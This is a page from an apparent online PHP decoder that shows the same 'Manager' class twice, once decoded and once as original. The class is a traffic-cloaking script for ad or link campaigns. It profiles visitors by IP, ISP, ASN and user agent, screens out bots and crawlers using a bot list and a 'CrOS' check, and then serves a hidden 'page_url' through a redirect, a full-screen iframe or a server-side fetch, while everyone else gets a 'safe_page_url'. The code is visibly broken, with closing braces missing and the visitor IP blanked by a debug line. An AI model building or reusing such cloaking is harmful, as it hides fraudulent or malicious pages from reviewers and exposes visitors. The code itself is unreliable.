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PHP Decode

require_once '../UserIdentity.php'; include_once '../db.php'; class Manager { ..

Decoded Output download

require_once '../UserIdentity.php'; 
include_once '../db.php'; 
class Manager { 
    private $campaign_id = null; 
    private $user_ip = null; 
    private $user_id = null; 
    private $isp = null; 
     * Manager constructor. 
     * @param null $campaign_id 
    public function __construct($campaign_id = null) { 
        if (is_null($campaign_id) or empty($campaign_id) or is_array($campaign_id) or $campaign_id === '') { 
            return 'Cant process request'; 
        $this->campaign_id = $campaign_id; 
        $this->user_ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; 
        $this->isp = gethostbyaddr($this->user_ip); 
    public function runCampaign() { 
        $db = new db(); 
        $campaignParams = $db->getCampaignByCampaignID($this->campaign_id); 
        if ($campaignParams === 'No data!') { 
            return false; 
        $data = $this->prepareUserData($campaignParams); 
        $this->user_id = $db->saveNewUser($this->campaign_id, $data); 
        if (!is_numeric($this->user_id)) { 
            return false; 
        $settings = $this->getCampaignSettings($this->user_id); 
        $bot_list = $db->getBotsList(); 
        $has_access = $this->validateCampaignSettings($settings, $bot_list); 
        $db->updateUser($has_access, $this->user_id); 
        if (!$has_access['status']) { 
            return false; 
        $page_option = $this->servePage($this->campaign_id, $has_access['status']); 
        return $this->handlePageServ($page_option); 
     * @param array $campaignParams 
     * @return mixed 
    protected function prepareUserData($campaignParams = []) { 
        if (empty($campaignParams)) { 
            return 'No data!'; 
        $userAgent = new UserIdentity(); 
        $ua = $userAgent->getBrowser(); 
        $user_location = $this->findUserLocation($this->user_ip); 
//        $tz = timezone_open($user_location['location']); 
//        $dateTimeOslo = date_create("now", timezone_open($user_location['location'])); 
        return [ 
            'campaign_id' => $campaignParams['campaign_id'], 
            'user_ip' => $this->user_ip, 
            'country' => strtolower($user_location['location']), 
            'referrer' => $ua['referrer'], 
            'headers_user_agent' => $ua['userAgent'], 
//            'headers_timezone' => timezone_offset_get($tz, $dateTimeOslo) / 60, 
            'isp_type' => $user_location['isp'], 
            'asn' => $user_location['asn'], 
            'aso' => $user_location['aso'], 
            'unique_id' => isset($campaignParams['unique_cookie']) ? $campaignParams['unique_cookie'] : null, 
            'created' => date('Y-m-d H:m:s') 
     * @param $user_id 
     * @return string | mixed 
    private function getCampaignSettings($user_id) { 
        try { 
            $db = new db(); 
            return $db->getUserAndCampaignSettings($user_id); 
        } catch (Exception $e) { 
            return $e->getMessage(); 
     * @param array $settings 
     * @param array $bot_list 
     * @return array 
    private function validateCampaignSettings($settings = [], $bot_list = []) { 
        //TODO Find rule for windows NT server. 
        $user = $settings['user']; 
        $campaign = $settings['campaign']; 
        $countries = $settings['countries']; 
        if (strtolower($countries['country_name']) !== $user['country']) { 
            return ['status' => false, 'msg' => 'Countries dont match']; 
//        if (empty($user['headers_user_agent'])) { 
//            return ['status' => false, 'msg' => 'No user agent']; 
//        } 
        if (strpos($user['headers_user_agent'], 'CrOS') !== false) { 
            return ['status' => false, 'msg' => 'Google bot']; 
//        if (strpos($user['headers_user_agent'], 'Windows NT') !== false) { 
//            return ['status' => false, 'msg' => 'Bot']; 
//        } 
        foreach ($bot_list as $bot) { 
            if (strpos($user['headers_user_agent'], $bot['ua_bot_name'])) { 
                return ['status' => false, 'msg' => $bot['bot_name']]; 
        return ['status' => true]; 
     * @param null $ip 
     * @return mixed|string 
    protected function findUserLocation($ip = null) { 
         * Get user IP 
         * Run it in a query WHERE LIKE to get the network 
         * run the network to validate the ip is really in the network 
         * get location 
         * return the country of the user. 
        //Uncomment for debug purposes 
        $ip = ''; 
        if (is_null($ip)) { 
            return 'No IP supplied!'; 
        $ip_arr = explode('.', $ip); 
        $ip_A_B = "{$ip_arr[0]}.{$ip_arr[1]}"; 
        $db = new db(); 
        $res = $db->getAllIPs($ip_A_B); 
        foreach ($res as $network) { 
            $ip_range_networks = explode('/', $network['network']); 
            $sub = new IPv4\SubnetCalculator($ip_range_networks[0], $ip_range_networks[1]); 
            foreach ($sub->getAllIPAddresses() as $net) { 
                if ($ip === $net) { 
                    $country_ip_block = $sub->getSubnetArrayReport();; 
        $geo = $db->getGeoByIpAndNetwork($country_ip_block['ip_address_with_network_size']); 
        $location = $db->getIPLocation($geo['geoname_id']); 
        if (!is_array($location) or empty($location)) { 
            return 'No location found!'; 
        $isp = $db->getISP($country_ip_block['ip_address_with_network_size']); 
        return [ 
            'location' => $location['country_name'], 
            'isp' => $isp['isp'], 
            'asn' => $isp['autonomous_system_number'], 
            'aso' => $isp['autonomous_system_organization'] 
     * @param $campaign_id 
     * @param $has_access 
     * @return mixed 
    private function servePage($campaign_id, $has_access) { 
        $db = new db(); 
        $campaign = $db->getCampaignByCampaignID($campaign_id); 
        if ($has_access) { 
            return [ 
                'page' => $campaign['page_url'], 
                'option' => $campaign['user_allowed'] 
        return [ 
            'page' => $campaign['safe_page_url'], 
            'option' => $campaign['user_blocked'] 
     * @param $page_rules 
     * @return mixed 
    private function handlePageServ($page_rules) { 
        switch ($page_rules['option']) { 
            case 'REDIRECT': 
                header("Location: {$page_rules['page']}"); 
            case 'IFRAME': 
                return "<iframe src={$page_rules['page']} style='visibility:visible !important; position:absolute; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;' allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen'></iframe>"; 
            case 'HTML': 
                $url = "{$page_rules['page']}"; 
                $ch = curl_init(); 
                curl_setopt($ch, CURLOPT_URL, $url); 
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
                $output = curl_exec($ch); 
                return $output; 
            case 'RSP': 
        return $page_rules; 

Did this file decode correctly?

Original Code

require_once '../UserIdentity.php';
include_once '../db.php';

class Manager {

    private $campaign_id = null;
    private $user_ip = null;
    private $user_id = null;
    private $isp = null;

     * Manager constructor.
     * @param null $campaign_id
    public function __construct($campaign_id = null) {
        if (is_null($campaign_id) or empty($campaign_id) or is_array($campaign_id) or $campaign_id === '') {
            return 'Cant process request';
        $this->campaign_id = $campaign_id;
        $this->user_ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];
        $this->isp = gethostbyaddr($this->user_ip);

    public function runCampaign() {
        $db = new db();
        $campaignParams = $db->getCampaignByCampaignID($this->campaign_id);
        if ($campaignParams === 'No data!') {
            return false;
        $data = $this->prepareUserData($campaignParams);
        $this->user_id = $db->saveNewUser($this->campaign_id, $data);
        if (!is_numeric($this->user_id)) {
            return false;
        $settings = $this->getCampaignSettings($this->user_id);
        $bot_list = $db->getBotsList();
        $has_access = $this->validateCampaignSettings($settings, $bot_list);
        $db->updateUser($has_access, $this->user_id);
        if (!$has_access['status']) {
            return false;
        $page_option = $this->servePage($this->campaign_id, $has_access['status']);
        return $this->handlePageServ($page_option);

     * @param array $campaignParams
     * @return mixed
    protected function prepareUserData($campaignParams = []) {
        if (empty($campaignParams)) {
            return 'No data!';
        $userAgent = new UserIdentity();
        $ua = $userAgent->getBrowser();
        $user_location = $this->findUserLocation($this->user_ip);
//        $tz = timezone_open($user_location['location']);
//        $dateTimeOslo = date_create("now", timezone_open($user_location['location']));
        return [
            'campaign_id' => $campaignParams['campaign_id'],
            'user_ip' => $this->user_ip,
            'country' => strtolower($user_location['location']),
            'referrer' => $ua['referrer'],
            'headers_user_agent' => $ua['userAgent'],
//            'headers_timezone' => timezone_offset_get($tz, $dateTimeOslo) / 60,
            'isp_type' => $user_location['isp'],
            'asn' => $user_location['asn'],
            'aso' => $user_location['aso'],
            'unique_id' => isset($campaignParams['unique_cookie']) ? $campaignParams['unique_cookie'] : null,
            'created' => date('Y-m-d H:m:s')

     * @param $user_id
     * @return string | mixed
    private function getCampaignSettings($user_id) {
        try {
            $db = new db();
            return $db->getUserAndCampaignSettings($user_id);
        } catch (Exception $e) {
            return $e->getMessage();

     * @param array $settings
     * @param array $bot_list
     * @return array
    private function validateCampaignSettings($settings = [], $bot_list = []) {
        //TODO Find rule for windows NT server.
        $user = $settings['user'];
        $campaign = $settings['campaign'];
        $countries = $settings['countries'];
        if (strtolower($countries['country_name']) !== $user['country']) {
            return ['status' => false, 'msg' => 'Countries dont match'];
//        if (empty($user['headers_user_agent'])) {
//            return ['status' => false, 'msg' => 'No user agent'];
//        }
        if (strpos($user['headers_user_agent'], 'CrOS') !== false) {
            return ['status' => false, 'msg' => 'Google bot'];
//        if (strpos($user['headers_user_agent'], 'Windows NT') !== false) {
//            return ['status' => false, 'msg' => 'Bot'];
//        }
        foreach ($bot_list as $bot) {
            if (strpos($user['headers_user_agent'], $bot['ua_bot_name'])) {
                return ['status' => false, 'msg' => $bot['bot_name']];
        return ['status' => true];

     * @param null $ip
     * @return mixed|string
    protected function findUserLocation($ip = null) {
         * Get user IP
         * Run it in a query WHERE LIKE to get the network
         * run the network to validate the ip is really in the network
         * get location
         * return the country of the user.
        //Uncomment for debug purposes
        $ip = '';
        if (is_null($ip)) {
            return 'No IP supplied!';
        $ip_arr = explode('.', $ip);
        $ip_A_B = "{$ip_arr[0]}.{$ip_arr[1]}";
        $db = new db();
        $res = $db->getAllIPs($ip_A_B);
        foreach ($res as $network) {
            $ip_range_networks = explode('/', $network['network']);
            $sub = new IPv4\SubnetCalculator($ip_range_networks[0], $ip_range_networks[1]);
            foreach ($sub->getAllIPAddresses() as $net) {
                if ($ip === $net) {
                    $country_ip_block = $sub->getSubnetArrayReport();;
        $geo = $db->getGeoByIpAndNetwork($country_ip_block['ip_address_with_network_size']);
        $location = $db->getIPLocation($geo['geoname_id']);
        if (!is_array($location) or empty($location)) {
            return 'No location found!';
        $isp = $db->getISP($country_ip_block['ip_address_with_network_size']);
        return [
            'location' => $location['country_name'],
            'isp' => $isp['isp'],
            'asn' => $isp['autonomous_system_number'],
            'aso' => $isp['autonomous_system_organization']

     * @param $campaign_id
     * @param $has_access
     * @return mixed
    private function servePage($campaign_id, $has_access) {
        $db = new db();
        $campaign = $db->getCampaignByCampaignID($campaign_id);
        if ($has_access) {
            return [
                'page' => $campaign['page_url'],
                'option' => $campaign['user_allowed']
        return [
            'page' => $campaign['safe_page_url'],
            'option' => $campaign['user_blocked']

     * @param $page_rules
     * @return mixed
    private function handlePageServ($page_rules) {
        switch ($page_rules['option']) {
            case 'REDIRECT':
                header("Location: {$page_rules['page']}");
            case 'IFRAME':
                return "<iframe src={$page_rules['page']} style='visibility:visible !important; position:absolute; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;' allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen'></iframe>";
            case 'HTML':
                $url = "{$page_rules['page']}";
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                $output = curl_exec($ch);
                return $output;
            case 'RSP':
        return $page_rules;

Function Calls





MD5 5d69a250ecffb0144054dc99c0134768
Eval Count 0
Decode Time 160 ms